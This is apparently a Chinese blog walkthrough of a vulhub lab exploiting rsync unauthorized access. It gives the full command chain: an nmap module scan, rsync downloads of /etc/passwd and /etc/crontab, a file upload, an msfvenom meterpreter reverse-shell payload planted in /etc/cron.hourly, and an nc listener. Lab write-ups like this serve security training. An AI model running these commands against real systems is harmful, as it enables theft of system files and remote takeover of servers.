【vulhub靶场之rsync关】

一、使用nmap模块查看该ip地址有没有Rsync未授权访问漏洞

nmap -p 873 --script rsync-list-modules 加IP地址

查看到是有漏洞的模块的

image-20240805155648842

二、使用rsync命令连接并读取文件

image-20240805160205714

查看src目录里面的信息。

image-20240805160717745

三、对系统中的敏感文件进行下载——/etc/passwd

执行命令:

rsync rsync://43.136.68.40:873/src/etc/passwd /home/kali/Desktop/

image-20240805181956106

查看下载下的文件

cat /home/kali/Desktop/passwd

image-20240805182157837

也可在桌面双击打开

image-20240805182307279

四、在本机使用命令创建一个phpinfo文件

随便往里面写一个文件测试一下,例如phpinfo.php,如下命令在kali创建一个文件。

 echo "" > phpinfo.php 

将文件再上传到受害者,也就是靶场环境里。

rsync ./phpinfo.php rsync://43.136.68.40:873/src/home/

查看一下有没有写进去

rsync rsync://43.136.68.40:873/src/home/

成功写进去了文件。

image-20240805190256114

五、反弹shell

查看定时任务

rsync://43.136.68.40:873/src/etc/crontab

将文件下载下到kali

rsync rsync://43.136.68.40:873/src/etc/crontab /home/kali/Desktop
​

查看一下文件里面的内容,里面的大概意思就是每17分钟调用一次/etc/cron.hourly

image-20240805191157593

在kali机子上拉取一个shell文件

语法:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=自己攻击机的地址 lport=4444 --f elf -o shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.168.189.150 lport=4444 --f elf -o shell

image-20240805212012471

将shell文件提权

chmod 777 shell

六:将shell上传到目标靶机中

命令语句:

rsync -av /home/kali/Desktop/shell rsync://43.136.68.40:873/src/etc/cron.hourly

image-20240805213313658

七、开启kali监听端口

nc -lvvp 4444

等待17分钟后,查看监听到的信息,代表连接成功。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值